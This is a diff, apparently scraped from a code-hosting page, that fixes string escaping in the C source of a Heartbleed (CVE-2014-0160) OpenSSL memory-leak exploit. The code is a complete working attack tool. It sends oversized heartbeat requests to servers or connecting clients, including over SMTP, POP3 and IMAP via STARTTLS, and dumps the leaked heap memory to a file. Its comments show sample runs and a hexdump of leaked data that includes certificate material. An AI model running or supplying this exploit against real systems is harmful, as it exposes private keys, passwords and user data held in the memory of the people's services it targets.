||||
c->socket = sd;
|
||||
|
@ -210,7 +210,7 @@ connection* tls_connect(int sd){
|
|||
ERR_print_errors_fp(stderr);
|
||||
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
|
||||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
|
||||
printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
|
||||
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
|
||||
}
|
||||
return c;
|
||||
}
|
||||
|
@ -221,13 +221,13 @@ connection* tls_bind(int sd){
|
|||
char* buf;
|
||||
buf = malloc(4096);
|
||||
if(buf==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(buf,0,4096);
|
||||
c = malloc(sizeof(connection));
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
c->socket = sd;
|
||||
|
@ -238,10 +238,10 @@ connection* tls_bind(int sd){
|
|||
ERR_print_errors_fp(stderr);
|
||||
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
|
||||
SSL_CTX_SRP_CTX_init(c->sslContext);
|
||||
SSL_CTX_use_certificate_file(c->sslContext, \\\"./server.crt\\\", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_PrivateKey_file(c->sslContext, \\\"./server.key\\\", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);
|
||||
if(!SSL_CTX_check_private_key(c->sslContext)){
|
||||
printf(\\\"[!] FATAL: private key does not match the certificate public key\\\\n\\\");
|
||||
printf("[!] FATAL: private key does not match the certificate public key\n");
|
||||
exit(0);
|
||||
}
|
||||
c->sslHandle = SSL_new(c->sslContext);
|
||||
|
@ -250,12 +250,12 @@ connection* tls_bind(int sd){
|
|||
if(!SSL_set_fd(c->sslHandle,c->socket))
|
||||
ERR_print_errors_fp(stderr);
|
||||
int rc = SSL_accept(c->sslHandle);
|
||||
printf (\\\"[ SSL connection using %s\\\\n\\\", SSL_get_cipher (c->sslHandle));
|
||||
printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
|
||||
bytes = SSL_read(c->sslHandle, buf, 4095);
|
||||
printf(\\\"[ recieved: %d bytes - showing output\\\\n%s\\\\n[\\\\n\\\",bytes,buf);
|
||||
printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
|
||||
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
|
||||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
|
||||
printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
|
||||
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
|
||||
}
|
||||
return c;
|
||||
}
|
||||
|
@ -269,16 +269,16 @@ int pre_cmd(int sd,int precmd,int verbose){
|
|||
char* line2;
|
||||
switch(precmd){
|
||||
case 0:
|
||||
line1 = \\\"EHLO test\\\\n\\\";
|
||||
line2 = \\\"STARTTLS\\\\n\\\";
|
||||
line1 = "EHLO test\n";
|
||||
line2 = "STARTTLS\n";
|
||||
break;
|
||||
case 1:
|
||||
line1 = \\\"CAPA\\\\n\\\";
|
||||
line2 = \\\"STLS\\\\n\\\";
|
||||
line1 = "CAPA\n";
|
||||
line2 = "STLS\n";
|
||||
break;
|
||||
case 2:
|
||||
line1 = \\\"a001 CAPB\\\\n\\\";
|
||||
line2 = \\\"a002 STARTTLS\\\\n\\\";
|
||||
line1 = "a001 CAPB\n";
|
||||
line2 = "a002 STARTTLS\n";
|
||||
break;
|
||||
default:
|
||||
go = 1;
|
||||
|
@ -287,23 +287,23 @@ int pre_cmd(int sd,int precmd,int verbose){
|
|||
if(go==0){
|
||||
buffer = malloc(2049);
|
||||
if(buffer==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(buffer,0,2049);
|
||||
rc = read(sd,buffer,2048);
|
||||
printf(\\\"[ banner: %s\\\",buffer);
|
||||
printf("[ banner: %s",buffer);
|
||||
send(sd,line1,strlen(line1),0);
|
||||
memset(buffer,0,2049);
|
||||
rc = read(sd,buffer,2048);
|
||||
if(verbose==1){
|
||||
printf(\\\"%s\\\\n\\\",buffer);
|
||||
printf("%s\n",buffer);
|
||||
}
|
||||
send(sd,line2,strlen(line2),0);
|
||||
memset(buffer,0,2049);
|
||||
rc = read(sd,buffer,2048);
|
||||
if(verbose==1){
|
||||
printf(\\\"%s\\\\n\\\",buffer);
|
||||
printf("%s\n",buffer);
|
||||
}
|
||||
}
|
||||
return sd;
|
||||
|
@ -314,7 +314,7 @@ void* heartbleed(connection *c,unsigned int type){
|
|||
int ret;
|
||||
buf = OPENSSL_malloc(1 + 2);
|
||||
if(buf==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
p = buf;
|
||||
|
@ -327,11 +327,11 @@ void* heartbleed(connection *c,unsigned int type){
|
|||
s2n(0xffff,p);
|
||||
break;
|
||||
default:
|
||||
printf(\\\"[ setting heartbeat payload_length to %u\\\\n\\\",type);
|
||||
printf("[ setting heartbeat payload_length to %u\n",type);
|
||||
s2n(type,p);
|
||||
break;
|
||||
}
|
||||
printf(\\\"[ <3 <3 <3 heart bleed <3 <3 <3\\\\n\\\");
|
||||
printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
|
||||
ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
|
||||
OPENSSL_free(buf);
|
||||
return c;
|
||||
|
@ -368,18 +368,18 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
version=(ssl_major<<8)|ssl_minor;
|
||||
n2s(p,rr->length);
|
||||
if(rr->type==24){
|
||||
printf(\\\"[ heartbeat returned type=%d length=%u\\\\n\\\",rr->type, rr->length);
|
||||
printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
|
||||
if(rr->length > 16834){
|
||||
printf(\\\"[ error: got a malformed TLS length.\\\\n\\\");
|
||||
printf("[ error: got a malformed TLS length.\n");
|
||||
exit(0);
|
||||
}
|
||||
}
|
||||
else{
|
||||
printf(\\\"[ incorrect record type=%d length=%u returned\\\\n\\\",rr->type,rr->length);
|
||||
printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
|
||||
s->packet_length=0;
|
||||
badpackets++;
|
||||
if(badpackets > 3){
|
||||
printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
|
||||
printf("[ error: too many bad packets recieved\n");
|
||||
exit(0);
|
||||
}
|
||||
goto apple;
|
||||
|
@ -390,7 +390,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
n=ssl3_read_n(s,i,i,1);
|
||||
if (n <= 0) goto apple;
|
||||
}
|
||||
printf(\\\"[ decrypting SSL packet\\\\n\\\");
|
||||
printf("[ decrypting SSL packet\n");
|
||||
s->rstate=SSL_ST_READ_HEADER;
|
||||
rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
|
||||
rr->data=rr->input;
|
||||
|
@ -457,11 +457,11 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
|
||||
first = 2;
|
||||
leakbytes = heartbleed_len + 16;
|
||||
printf(\\\"[ heartbleed leaked length=%u\\\\n\\\",heartbleed_len);
|
||||
printf("[ heartbleed leaked length=%u\n",heartbleed_len);
|
||||
}
|
||||
if(verbose==1){
|
||||
{ unsigned int z; for (z=0; z<rr->length; z++) printf(\\\"%02X%c\\\",rr->data[z],((z+1)%16)?\\\' \\\':\\\'\\\\n\\\'); }
|
||||
printf(\\\"\\\\n\\\");
|
||||
{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
|
||||
printf("\n");
|
||||
}
|
||||
leakbytes-=rr->length;
|
||||
if(leakbytes > 0){
|
||||
|
@ -470,7 +470,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
else{
|
||||
repeat = 0;
|
||||
}
|
||||
printf(\\\"[ final record type=%d, length=%u\\\\n\\\", rr->type, rr->length);
|
||||
printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
|
||||
int output = s->s3->rrec.length-3;
|
||||
if(output > 0){
|
||||
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
|
||||
|
@ -478,48 +478,48 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
first--;
|
||||
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
|
||||
/* first three bytes are resp+len */
|
||||
printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length-3,filename);
|
||||
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
|
||||
}
|
||||
else{
|
||||
/* heap data & 16 bytes padding */
|
||||
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
|
||||
printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length,filename);
|
||||
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
|
||||
}
|
||||
close(fd);
|
||||
}
|
||||
else{
|
||||
printf(\\\"[ nothing from the heap to write\\\\n\\\");
|
||||
printf("[ nothing from the heap to write\n");
|
||||
}
|
||||
return;
|
||||
apple:
|
||||
printf(\\\"[ problem handling SSL record packet - wrong type?\\\\n\\\");
|
||||
printf("[ problem handling SSL record packet - wrong type?\n");
|
||||
badpackets++;
|
||||
if(badpackets > 3){
|
||||
printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
|
||||
printf("[ error: too many bad packets recieved\n");
|
||||
exit(0);
|
||||
}
|
||||
return;
|
||||
}
|
||||
|
||||
void usage(){
|
||||
printf(\\\"[\\\\n\\\");
|
||||
printf(\\\"[ --server|-s <ip/dns> - the server to target\\\\n\\\");
|
||||
printf(\\\"[ --port|-p <port> - the port to target\\\\n\\\");
|
||||
printf(\\\"[ --file|-f <filename> - file to write data to\\\\n\\\");
|
||||
printf(\\\"[ --bind|-b <ip> - bind to ip for exploiting clients\\\\n\\\");
|
||||
printf(\\\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\\\n\\\");
|
||||
printf(\\\"[ 0 = SMTP\\\\n\\\");
|
||||
printf(\\\"[ 1 = POP3\\\\n\\\");
|
||||
printf(\\\"[ 2 = IMAP\\\\n\\\");
|
||||
printf(\\\"[ --loop|-l - loop the exploit attempts\\\\n\\\");
|
||||
printf(\\\"[ --type|-t <n> - select exploit to try\\\\n\\\");
|
||||
printf(\\\"[ 0 = null length\\\\n\\\");
|
||||
printf(\\\"[ 1 = max leak\\\\n\\\");
|
||||
printf(\\\"[ n = heartbeat payload_length\\\\n\\\");
|
||||
printf(\\\"[\\\\n\\\");
|
||||
printf(\\\"[ --verbose|-v - output leak to screen\\\\n\\\");
|
||||
printf(\\\"[ --help|-h - this output\\\\n\\\");
|
||||
printf(\\\"[\\\\n\\\");
|
||||
printf("[\n");
|
||||
printf("[ --server|-s <ip/dns> - the server to target\n");
|
||||
printf("[ --port|-p <port> - the port to target\n");
|
||||
printf("[ --file|-f <filename> - file to write data to\n");
|
||||
printf("[ --bind|-b <ip> - bind to ip for exploiting clients\n");
|
||||
printf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\n");
|
||||
printf("[ 0 = SMTP\n");
|
||||
printf("[ 1 = POP3\n");
|
||||
printf("[ 2 = IMAP\n");
|
||||
printf("[ --loop|-l - loop the exploit attempts\n");
|
||||
printf("[ --type|-t <n> - select exploit to try\n");
|
||||
printf("[ 0 = null length\n");
|
||||
printf("[ 1 = max leak\n");
|
||||
printf("[ n = heartbeat payload_length\n");
|
||||
printf("[\n");
|
||||
printf("[ --verbose|-v - output leak to screen\n");
|
||||
printf("[ --help|-h - this output\n");
|
||||
printf("[\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -531,88 +531,88 @@ int main(int argc, char* argv[]){
|
|||
connection* c;
|
||||
char *host, *file;
|
||||
int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
|
||||
printf(\\\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\\\n\\\");
|
||||
printf(\\\"[ =============================================================\\\\n\\\");
|
||||
printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
|
||||
printf("[ =============================================================\n");
|
||||
static struct option options[] = {
|
||||
{\\\"server\\\", 1, 0, \\\'s\\\'},
|
||||
{\\\"port\\\", 1, 0, \\\'p\\\'},
|
||||
{\\\"file\\\", 1, 0, \\\'f\\\'},
|
||||
{\\\"type\\\", 1, 0, \\\'t\\\'},
|
||||
{\\\"bind\\\", 1, 0, \\\'b\\\'},
|
||||
{\\\"verbose\\\", 0, 0, \\\'v\\\'},
|
||||
{\\\"precmd\\\", 1, 0, \\\'c\\\'},
|
||||
{\\\"loop\\\", 0, 0, \\\'l\\\'},
|
||||
{\\\"help\\\", 0, 0,\\\'h\\\'}
|
||||
{"server", 1, 0, 's'},
|
||||
{"port", 1, 0, 'p'},
|
||||
{"file", 1, 0, 'f'},
|
||||
{"type", 1, 0, 't'},
|
||||
{"bind", 1, 0, 'b'},
|
||||
{"verbose", 0, 0, 'v'},
|
||||
{"precmd", 1, 0, 'c'},
|
||||
{"loop", 0, 0, 'l'},
|
||||
{"help", 0, 0,'h'}
|
||||
};
|
||||
while(userc != -1) {
|
||||
userc = getopt_long(argc,argv,\\\"s:p:f:t:b:c:lvh\\\",options,&index);
|
||||
userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);
|
||||
switch(userc) {
|
||||
case -1:
|
||||
break;
|
||||
case \\\'s\\\':
|
||||
case 's':
|
||||
if(ihost==0){
|
||||
ihost = 1;
|
||||
h = gethostbyname(optarg);
|
||||
if(h==NULL){
|
||||
printf(\\\"[!] FATAL: unknown host \\\'%s\\\'\\\\n\\\",optarg);
|
||||
printf("[!] FATAL: unknown host '%s'\n",optarg);
|
||||
exit(1);
|
||||
}
|
||||
host = malloc(strlen(optarg) + 1);
|
||||
if(host==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
sprintf(host,\\\"%s\\\",optarg);
|
||||
sprintf(host,"%s",optarg);
|
||||
}
|
||||
break;
|
||||
case \\\'p\\\':
|
||||
case 'p':
|
||||
if(iport==0){
|
||||
port = atoi(optarg);
|
||||
iport = 1;
|
||||
}
|
||||
break;
|
||||
case \\\'f\\\':
|
||||
case 'f':
|
||||
if(ifile==0){
|
||||
file = malloc(strlen(optarg) + 1);
|
||||
if(file==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
sprintf(file,\\\"%s\\\",optarg);
|
||||
sprintf(file,"%s",optarg);
|
||||
ifile = 1;
|
||||
}
|
||||
break;
|
||||
case \\\'t\\\':
|
||||
case 't':
|
||||
if(itype==0){
|
||||
type = atoi(optarg);
|
||||
itype = 1;
|
||||
}
|
||||
break;
|
||||
case \\\'h\\\':
|
||||
case 'h':
|
||||
usage();
|
||||
break;
|
||||
case \\\'b\\\':
|
||||
case 'b':
|
||||
if(ihost==0){
|
||||
ihost = 1;
|
||||
host = malloc(strlen(optarg)+1);
|
||||
if(host==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
sprintf(host,\\\"%s\\\",optarg);
|
||||
sprintf(host,"%s",optarg);
|
||||
bind = 1;
|
||||
}
|
||||
break;
|
||||
case \\\'c\\\':
|
||||
case 'c':
|
||||
if(iprecmd == 0){
|
||||
iprecmd = 1;
|
||||
precmd = atoi(optarg);
|
||||
}
|
||||
break;
|
||||
case \\\'v\\\':
|
||||
case 'v':
|
||||
verbose = 1;
|
||||
break;
|
||||
case \\\'l\\\':
|
||||
case 'l':
|
||||
loop = 1;
|
||||
break;
|
||||
default:
|
||||
|
@ -620,7 +620,7 @@ int main(int argc, char* argv[]){
|
|||
}
|
||||
}
|
||||
if(ihost==0||iport==0||ifile==0||itype==0||type < 0){
|
||||
printf(\\\"[ try --help\\\\n\\\");
|
||||
printf("[ try --help\n");
|
||||
exit(0);
|
||||
}
|
||||
ssl_init();
|
||||
|
@ -633,7 +633,7 @@ int main(int argc, char* argv[]){
|
|||
sneakyleaky(c,file,verbose);
|
||||
}
|
||||
while(loop==1){
|
||||
printf(\\\"[ entered heartbleed loop\\\\n\\\");
|
||||
printf("[ entered heartbleed loop\n");
|
||||
first=0;
|
||||
repeat=1;
|
||||
heartbleed(c,type);
|
||||
|
@ -641,7 +641,7 @@ int main(int argc, char* argv[]){
|
|||
sneakyleaky(c,file,verbose);
|
||||
}
|
||||
}
|
||||
printf(\\\"[ done.\\\\n\\\");
|
||||
printf("[ done.\n");
|
||||
exit(0);
|
||||
}
|
||||
else{
|
||||
|
@ -650,7 +650,7 @@ int main(int argc, char* argv[]){
|
|||
while(1){
|
||||
sd=accept(ret,0,0);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] FATAL: problem with accept()\\\\n\\\");
|
||||
printf("[!] FATAL: problem with accept()\n");
|
||||
exit(0);
|
||||
}
|
||||
if(pid=fork()){
|
||||
|
@ -664,7 +664,7 @@ int main(int argc, char* argv[]){
|
|||
sneakyleaky(c,file,verbose);
|
||||
}
|
||||
while(loop==1){
|
||||
printf(\\\"[ entered heartbleed loop\\\\n\\\");
|
||||
printf("[ entered heartbleed loop\n");
|
||||
first=0;
|
||||
repeat=0;
|
||||
heartbleed(c,type);
|
||||
|
@ -672,7 +672,7 @@ int main(int argc, char* argv[]){
|
|||
sneakyleaky(c,file,verbose);
|
||||
}
|
||||
}
|
||||
printf(\\\"[ done.\\\\n\\\");
|
||||
printf("[ done.\n");
|
||||
exit(0);
|
||||
}
|
||||
}
|
||||
|
|
|
@ -16,7 +16,7 @@
|
|||
* and can be run in a loop until the connected peer ends connection.
|
||||
* The data leaked contains 16 bytes of random padding at the end.
|
||||
* The exploit can be used against a connecting client or server,
|
||||
* it can also send pre_cmd\\\'s to plain-text services to establish
|
||||
* it can also send pre_cmd's to plain-text services to establish
|
||||
* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
|
||||
* will often forcefully close the connection during large leak
|
||||
* requests so try to lower your payload request size.
|
||||
|
@ -35,23 +35,23 @@
|
|||
* [ decrypting SSL packet
|
||||
* [ heartbleed leaked length=65535
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16381 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16381 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=16408
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16384 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16384 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=16408
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16384 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16384 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=16408
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16384 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16384 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=42
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=18
|
||||
* [ wrote 18 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 18 bytes of heap to file 'out'
|
||||
* [ done.
|
||||
* $ ls -al out
|
||||
* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
|
||||
|
@ -60,11 +60,11 @@
|
|||
*
|
||||
* Use following example command to generate certificates for clients.
|
||||
*
|
||||
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\\
|
||||
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
|
||||
* -keyout server.key -out server.crt
|
||||
*
|
||||
* Debian compile with \\\"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\\
|
||||
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\\\"
|
||||
* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
|
||||
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto"
|
||||
*
|
||||
* todo: add udp/dtls support.
|
||||
*
|
||||
|
@ -87,7 +87,7 @@
|
|||
* [ decrypting SSL packet
|
||||
* [ heartbleed leaked length=1336
|
||||
* [ final record type=24, length=1355
|
||||
* [ wrote 1352 bytes of heap to file \\\'eshta\\\'
|
||||
* [ wrote 1352 bytes of heap to file 'eshta'
|
||||
*
|
||||
*
|
||||
* # hexdump -C eshta
|
||||
|
@ -120,20 +120,20 @@
|
|||
* [ decrypting SSL packet
|
||||
* [ heartbleed leaked length=1336
|
||||
* [ final record type=24, length=1355
|
||||
* [ wrote 1352 bytes of heap to file \\\'eshta\\\'
|
||||
* [ wrote 1352 bytes of heap to file 'eshta'
|
||||
*
|
||||
*
|
||||
* # hexdump -C eshta
|
||||
* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|
|
||||
* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...\\\".(n|
|
||||
* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...".(n|
|
||||
* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|
|
||||
* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|
|
||||
* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\\\.h.|
|
||||
* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\.h.|
|
||||
* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|
|
||||
* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|
|
||||
* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|
|
||||
* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|
|
||||
* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..\\\'H...|
|
||||
* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|
|
||||
* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|
|
||||
* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |.........@b...E_|
|
||||
* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|
|
||||
|
@ -142,20 +142,20 @@
|
|||
* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|
|
||||
* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|
|
||||
* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |
|
||||
* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0..\\\"0...*.H..|
|
||||
* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0.."0...*.H..|
|
||||
* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....|
|
||||
* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|
|
||||
* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|
|
||||
* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|
|
||||
* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\\\....|
|
||||
* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\....|
|
||||
* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|
|
||||
* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|
|
||||
* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|
|
||||
* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|
|
||||
* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|
|
||||
* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|
|
||||
* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.\\\'f.]UM..q..|
|
||||
* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\\\?...a,...|
|
||||
* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|
|
||||
* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\?...a,...|
|
||||
* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|
|
||||
* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|
|
||||
* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|
|
||||
|
@ -168,21 +168,21 @@
|
|||
* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|
|
||||
* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|
|
||||
* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |.@X-.2....d.....|
|
||||
* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.\\\'..K..|
|
||||
* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|
|
||||
* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|
|
||||
* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|
|
||||
* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |.\\\"..m!./.....\\\\.D|
|
||||
* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |."..m!./.....\.D|
|
||||
* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |...AL..@.T.....j|
|
||||
* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|
|
||||
* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e....\\\"|
|
||||
* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e...."|
|
||||
* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |..b...d..p...@.I|
|
||||
* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|
|
||||
* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|
|
||||
* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|
|
||||
* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|
|
||||
* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q.\\\"gf.\\\"...1...;|
|
||||
* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q."gf."...1...;|
|
||||
* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|
|
||||
